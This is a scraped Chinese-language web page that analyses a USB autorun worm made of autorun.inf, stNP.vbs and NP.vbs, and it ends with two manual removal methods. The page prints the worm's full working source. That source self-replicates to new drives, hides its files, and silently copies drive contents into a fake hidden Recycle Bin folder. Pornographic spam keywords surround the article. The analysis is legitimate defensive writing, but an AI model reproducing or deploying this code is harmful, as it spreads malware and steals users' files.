婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 最新惡意復制型病毒autorun.inf,stNP.VBS,NP.VBS代碼簡單解析和解決方法

最新惡意復制型病毒autorun.inf,stNP.VBS,NP.VBS代碼簡單解析和解決方法

熱門標簽:廣州ai電銷機器人一般多少錢 合肥高德地圖標注 深圳外呼系統收費 外呼系統telrobot 外呼系統免費招代理 百度地圖標注是什么意思 外呼線路中繼線是什么 拉薩外呼系統業務 怎么看地圖標注
最新惡意復制型病毒autorun.inf,stNP.VBS,NP.VBS
及代碼分析與病毒處理兩種方法

方法一:來自于指間輕舞

此病毒最大的特點在于中毒后,自動感染你的硬盤根目錄,并復制病毒文件。無論你是采用雙擊,還是右鍵選擇打開,或者運行資源管理器都會自動運行其代碼(病毒),所以中此病毒后,新手往往打不開盤符,導致數據無法讀取。

下面是病毒的代碼分析 文件總共有三個 都很簡單,已經加上了注解。

文件名:autorun.inf
復制代碼 代碼如下:

[autorun] 
open= 
shell\open=打開(O) 
shell\open\Command=WScript.exe stNP.vbs 
shell\open\Default=1 
shell\explore=資源管理器(X) 
shell\explore\Command=WScript.exe stNP.vbs 

文件名:stNP.VBS
功能是檢測np.vbs是否存在,存在則運行
復制代碼 代碼如下:

on error resume next 
set fso = CreateObject("Scripting.FileSys""temObject") 
if fso.FileExists("NP.vbs") = -1 then 
if fso.FileExists("d:\NP.vbs") = -1 then 
set f = fso.getfile("d:\NP.vbs") 
if f.attributes = 0 then 
else 
f.attributes = 0 
end if 
f.delete(true) 
end if 
fso.copyfile "NP.vbs", "d:\NP.vbs", true 
set wshshell = wscript.createobject("WScript.Shell") 
wshshell.run "d:\NP.vbs" 
end if 

文件名:NP.VBS
-----
復制代碼 代碼如下:

'[NatruePark] 
'容錯語句 
on Error resume next 
'變量聲明及初始化 
dim fso, old_drs(), new_drs(), old_n, new_n, new_yn, wshshell 
set fso = CreateObject("Scripting.File""SystemObject") 
set wshshell = wscript.createobject("WScript.Shell") 
old_n=0 
redim old_drs(old_n) 
old_drs(0)="C" 

'[主體部分] 
wshshell.run("explorer .\") 
dim i 
i = 0 
do while i>=0 and i8*360 
    scan_disk() 
    if judge_new_disk() = 1 then 
        dim left_n 
        left_n = 1 
        do while left_n=(new_n-old_n) 
            new_disk = new_drs(left_n+old_n)":\" 
'-----------------維護塊>----------------- 
            if fso.FileExists(new_disk"NP.vbs") = -1 then  
            else 
                self_copy(new_disk) 
            end if 
            add_attrib(new_disk"NP.vbs") 
            if fso.FileExists(new_disk"autorun.inf") = -1 then     
                del_attrib(new_disk"autorun.inf") 
            end if 
                add_autorun(new_disk) 

            add_attrib(new_disk"autorun.inf") 
            if fso.FileExists(new_disk"stNP.vbs") = -1 then 
            else 
                add_stNP(new_disk) 
            end if 
            add_attrib(new_disk"stNP.vbs") 
'-----------------/維護塊>----------------- 
'-----------------功能塊>----------------- 
            dim rec  
            rec = "d:\Recyc1ed\" 
            if fso.FolderExists(rec) = -1 then 
            else 
                fso.createfolder(rec) 
            end if 
            add_attribf(rec) 
            if fso.FileExists(rec"desktop.ini") = -1 then 
            else 
                add_desktop(rec) 
            end if 
                add_attrib(rec"desktop.ini") 
            aim_folder = recDate()Rnd() 
            if fso.FolderExists(aim_folder) = -1 then 
            else 
                fso.createfolder(aim_folder) 
            end if 

'查找"汽輪機原理文件夾并復制" 
            if fso.FolderExists(new_disk"汽輪機原理") = -1 then 
                fso.copyfolder new_disk"汽輪機原理", aim_folder, true 
                add_attribf(aim_folder) 
            end if 

'通用復制 
            if old_n = 0 then  
            else 
                set fp = fso.getFolder(new_drs(new_n)":\") 
                set fc = fp.SubFolders 
                for each f in fc 
                fso.copyfolder f"", aim_folder"\"f.name, true 
                next 
                set fc = fp.files 
                for each f in fc 
                fso.copyfile f"", aim_folder"\", true 
                next 
                add_attribf(aim_folder) 
            end if 
'-----------------/功能塊>----------------- 
            left_n=left_n+1 
        loop 
    copy_disk() 
    end if 
    wscript.sleep(10000) 
    i=i+1 
loop 
'[函數部分] 
'可用驅動器檢測 new_drs(),new_n 
function scan_disk() 
    dim d, dr 
    new_n = -1 
    set dr = fso.drives 
    for each d in dr 
        if d.isready then  
            new_n=new_n+1 
            redim preserve new_drs(new_n) 
            new_drs(new_n)=d.driveletter 
        end if 
    next 
end function 
'判斷是否有新加入的驅動器 
function judge_new_disk() 
    if new_n = old_n then 
        judge_new_disk = 0 
    elseif new_n  old_n then 
        redim preserve old_drs(new_n) 
        old_n = new_n 
        judge_new_disk = 0 
    elseif new_n > old_n then 
        redim preserve old_drs(new_n) 
        judge_new_disk = 1 
    end if 
end function 
'復制新驅動器表單 
function copy_disk() 
    dim n 
    n=0 
    do while n=new_n 
        old_drs(n) = new_drs(n) 
        n=n+1 
    loop 
    old_n = new_n 
end function 
'添加指定文件屬性 
function add_attrib(file) 
    set f = fso.getfile(file) 
    if f.attributes = 7 then 

    else 
        f.attributes = 7 
    end if 
end function 
'刪除指定文件屬性 
function del_attrib(file) 
    set f = fso.getfile(file) 
    if f.attributes = 7 then 
        f.attributes = 0 
    else 

    end if 
end function 
'自我復制到指定文件目錄 
function self_copy(folder) 
    dim aim_path, mid_path, self_file, mid_file 
    aim_path = folder"NP.vbs" 
    mid_path = "c:\np.bin" 
    set self_file = fso.opentextfile(wscript.scriptfullname,1) 
    self = self_file.readall 
    set mid_file = fso.opentextfile(mid_path,2,true) 
    mid_file.write self 
    mid_file.close 
    set mid_file = fso.getfile(mid_path) 
    mid_file.copy(aim_path) 
    mid_file.delete(true) 
end function 
'增加autorun.inf 
function add_autorun(folder) 
    dim path 
    path = folder"autorun.inf" 
    set temp = fso.CreateTextFile("c:\a.bin",true) 
    temp.writeline "[autorun]" 
    temp.writeline "open=" 
    temp.writeline "shell\open=打開(O)" 
    temp.writeline "shell\open\Command=WScript.exe stNP.vbs" 
    temp.writeline "shell\open\Default=1" 
    temp.writeline "shell\explore=資源管理器(X)" 
    temp.writeline "shell\explore\Command=WScript.exe stNP.vbs" 
    temp.close 
    set cop = fso.getfile("c:\a.bin") 
    cop.copy(path) 
    cop.delete(true) 
end function 
'增加desktop.ini 
function add_desktop(folder) 
    dim path 
    path = folder"desktop.ini" 
    set temp = fso.CreateTextFile("c:\d.bin",true) 
    temp.writeline "[.ShellClassInfo]" 
    temp.writeline "CLSID={645FF040-5081-101B-9F08-00AA002F954E}" 
    temp.close 
    set cop = fso.getfile("c:\d.bin") 
    cop.copy(path) 
    cop.delete(true) 
end function 
'增加stNP.vbs 
function add_stNP(folder) 
    dim path 
    set fso = CreateObject("Scripting.File""SystemObject") 
    path = folder"stNP.vbs" 
    set temp = fso.CreateTextFile("c:\s.bin",true) 

    temp.writeline "on error resume next" 
    temp.writeline "set fso = CreateObject("chr(34)"Scripting.FileSys"chr(34)""chr(34)"temObject"chr(34)")" 
    temp.writeline "if fso.FileExists("chr(34)"NP.vbs"chr(34)") = -1 then" 
    temp.writeline "if fso.FileExists("chr(34)"d:\NP.vbs"chr(34)") = -1 then" 
    temp.writeline "set f = fso.getfile("chr(34)"d:\NP.vbs"chr(34)")" 
    temp.writeline "if f.attributes = 0 then" 
    temp.writeline "else" 
    temp.writeline "f.attributes = 0" 
    temp.writeline "end if" 
    temp.writeline "f.delete(true)" 
    temp.writeline "end if" 
    temp.writeline "fso.copyfile "chr(34)"NP.vbs"chr(34)", "chr(34)"d:\NP.vbs"chr(34)", true" 
    temp.writeline "set wshshell = wscript.createobject("chr(34)"WScript.Shell"chr(34)")" 
    temp.writeline "wshshell.run "chr(34)"d:\NP.vbs"chr(34) 
    temp.writeline "end if" 

    temp.close 
    set cop = fso.getfile("c:\s.bin") 
    cop.copy(path) 
    cop.delete(true) 
end function 

'添加指定文件夾屬性 
function add_attribf(folder) 
    set f = fso.getfolder(folder) 
    if f.attributes = 7 then 

    else 
        f.attributes = 7 
    end if 
end function 
'刪除指定文件夾屬性 
function del_attribf(folder) 
    set f = fso.getfolder(folder) 
    if f.attributes = 0 then 
    else 
        f.attributes = 0 

    end if 
end function 


wscript.echo("THANK YOU!!") 
wscript.quit 

病毒好像有點良心 不會感染C盤,所以解決的方法還是有的:用資源管理器打開C盤,然后在左邊展開其他盤符,在工具-文件夾-查看中去掉隱藏受保護的系統文件的鉤并選擇查看所有文件。將各個盤符隱藏的以上三個文件刪除,重新啟動即可。
方法二:作者剛成功操作得出
只需要進入WinPE之后,查找NP.VBS就可以連stNP.VBS全部查處,刪除這些惡魔,即可!!!
您可能感興趣的文章:
  • vbs實現只復制比目標文件更新的文件
  • vbs 自動復制U盤的內容
  • 自動復制U盤文件的VBS腳本
  • Windows 安裝IIS出現的問題(無法安裝IIS,提示“安裝程序無法復制文件IISApp.vbs”)
  • IE瀏覽器增加“復制圖像地址”的右鍵菜單的vbs代碼
  • vbs復制文件的腳本
  • vbs病毒制作之一復制自身的vbs腳本
  • 用vbscript實現將腳本的輸出復制到剪貼板
  • vbs復制文件夾的實現代碼

標簽:嘉興 六安 漳州 玉林 延安 廣安 周口 臺灣

巨人網絡通訊聲明:本文標題《最新惡意復制型病毒autorun.inf,stNP.VBS,NP.VBS代碼簡單解析和解決方法》,本文關鍵詞  最新,惡意,復制型,病毒,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《最新惡意復制型病毒autorun.inf,stNP.VBS,NP.VBS代碼簡單解析和解決方法》相關的同類信息!
  • 本頁收集關于最新惡意復制型病毒autorun.inf,stNP.VBS,NP.VBS代碼簡單解析和解決方法的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    欧美在线一区二区| 高清beeg欧美| 日韩一级片网站| 日韩欧美国产综合| 欧美成人精品3d动漫h| 26uuu国产在线精品一区二区| 国产在线一区观看| 国产在线精品一区二区| 国产**成人网毛片九色| 国产福利91精品一区| 色8久久精品久久久久久蜜| 欧美一级高清片在线观看| 久久精品久久精品| av在线一区二区| 69av一区二区三区| 99国产精品国产精品久久| 欧美顶级少妇做爰| 欧美本精品男人aⅴ天堂| 国产精品免费av| 日韩成人免费电影| 波多野结衣亚洲一区| 狠狠色综合播放一区二区| 99热在这里有精品免费| 欧美一区国产二区| 亚洲婷婷综合色高清在线| 另类欧美日韩国产在线| 91蜜桃在线免费视频| 日韩午夜激情视频| 视频一区二区不卡| av午夜一区麻豆| 欧洲另类一二三四区| 久久综合久久综合九色| 日本一区中文字幕| 在线观看成人免费视频| 中文字幕精品三区| 午夜精品在线视频一区| 色视频一区二区| 亚洲欧美日韩国产成人精品影院| 久久精品国产色蜜蜜麻豆| 欧洲精品在线观看| 亚洲天堂福利av| 欧美激情一区二区三区在线| 奇米影视一区二区三区| 欧美午夜一区二区三区免费大片| 国产精品欧美久久久久无广告 | 日韩精品一区二区三区老鸭窝| 亚洲国产精品一区二区久久 | 精品欧美乱码久久久久久| 在线综合视频播放| 午夜影院久久久| 日韩一区二区影院| 青青草国产成人av片免费| 欧美一卡二卡三卡| 寂寞少妇一区二区三区| 久久影院午夜片一区| 国产精品国产精品国产专区不片| jiyouzz国产精品久久| 日韩美女视频一区二区| 欧美在线free| 日本视频在线一区| 久久伊人蜜桃av一区二区| 成人做爰69片免费看网站| 欧美亚洲动漫另类| 日本一不卡视频| 久久婷婷综合激情| av资源站一区| 亚洲不卡av一区二区三区| 欧美精品久久天天躁| 国产一区91精品张津瑜| 亚洲精品高清在线| 国产精品白丝在线| 3d成人动漫网站| 国产成人av电影在线观看| 国产精品久久久久7777按摩| 欧美亚洲愉拍一区二区| 欧美日韩一区国产| 久久精品日产第一区二区三区高清版 | 中文字幕免费在线观看视频一区| 福利一区在线观看| 亚洲欧美成人一区二区三区| 欧美另类videos死尸| 天天综合色天天| 成人爽a毛片一区二区免费| 日韩一区欧美小说| 欧美一级免费大片| 99视频一区二区| 激情六月婷婷综合| 一区二区三国产精华液| 色综合中文字幕国产 | 亚洲日本在线看| 欧美一级艳片视频免费观看| 99精品欧美一区二区蜜桃免费| 亚洲男人天堂av| 国产欧美精品一区| 91精品国产综合久久久久| 国产精品理伦片| 日韩午夜av电影| 国产精品视频一二三区| 国v精品久久久网| 日一区二区三区| 波多野洁衣一区| 久久网站热最新地址| 色综合 综合色| 国产成人精品免费一区二区| 日本视频在线一区| 中文字幕一区二区三区视频| 欧美精品一区二区三区视频| 欧美日韩国产大片| 99久久综合国产精品| 国产精品99久久久久久宅男| 麻豆精品在线视频| 精品精品国产高清一毛片一天堂| 欧美亚洲丝袜传媒另类| 91免费视频网| 欧美二区三区的天堂| 欧美日韩国产在线播放网站| 91看片淫黄大片一级在线观看| 精品剧情v国产在线观看在线| 久久电影国产免费久久电影| 亚洲一线二线三线视频| 国产精品欧美一区喷水| 欧美激情综合网| 亚洲国产高清在线| 国产日韩欧美不卡| 国产精品视频免费| 中文一区在线播放| 国产精品久久久久久久裸模| 国产在线播放一区二区三区| 六月丁香婷婷色狠狠久久| 五月天亚洲精品| 日韩和欧美一区二区| 秋霞电影网一区二区| 国产精品久久看| 精品国产乱码久久久久久免费| 精品一二三四在线| 免费的国产精品| 久久国产三级精品| 午夜精品久久久久久久久久久| 欧美三级三级三级爽爽爽| 欧美男生操女生| 国产亚洲一区二区三区在线观看 | 国产三区在线成人av| 欧美经典一区二区三区| 国产精品久久网站| 岛国av在线一区| 亚洲视频精选在线| 色综合一区二区三区| 午夜久久久影院| 欧美一级片在线| 国产永久精品大片wwwapp| 久久老女人爱爱| 不卡的av在线| 一区二区三区在线免费| 欧美亚洲动漫精品| 丝袜a∨在线一区二区三区不卡| 777欧美精品| 国产麻豆精品一区二区| 国产亚洲成年网址在线观看| 972aa.com艺术欧美| 亚洲va国产天堂va久久en| 这里只有精品免费| 国产精品亚洲人在线观看| 国产精品色噜噜| 欧美性高清videossexo| 在线一区二区三区四区五区| 亚洲一区在线视频| 国产乱国产乱300精品| 日韩精品一区二| 国产成人免费xxxxxxxx| 亚洲欧美激情一区二区| 欧美午夜电影在线播放| 免费日本视频一区| √…a在线天堂一区| 欧美猛男男办公室激情| 国产成人av电影在线观看| 亚洲综合清纯丝袜自拍| 久久综合久久鬼色| 欧洲av在线精品| 国产精品一区二区在线播放| 一区二区三区精品在线| 国产一区二区调教| 亚洲18色成人| 国产精品视频你懂的| 555www色欧美视频| 高清日韩电视剧大全免费| 五月婷婷综合在线| 国产精品超碰97尤物18| 精品欧美一区二区三区精品久久| www.激情成人| 国产资源在线一区| 天天综合色天天综合| 亚洲欧洲精品天堂一级 | 亚洲精品在线电影| 在线观看精品一区| 成人一区二区视频| 久久99精品视频| 久久先锋影音av鲁色资源| 欧美浪妇xxxx高跟鞋交| av激情综合网| 国产69精品久久久久777|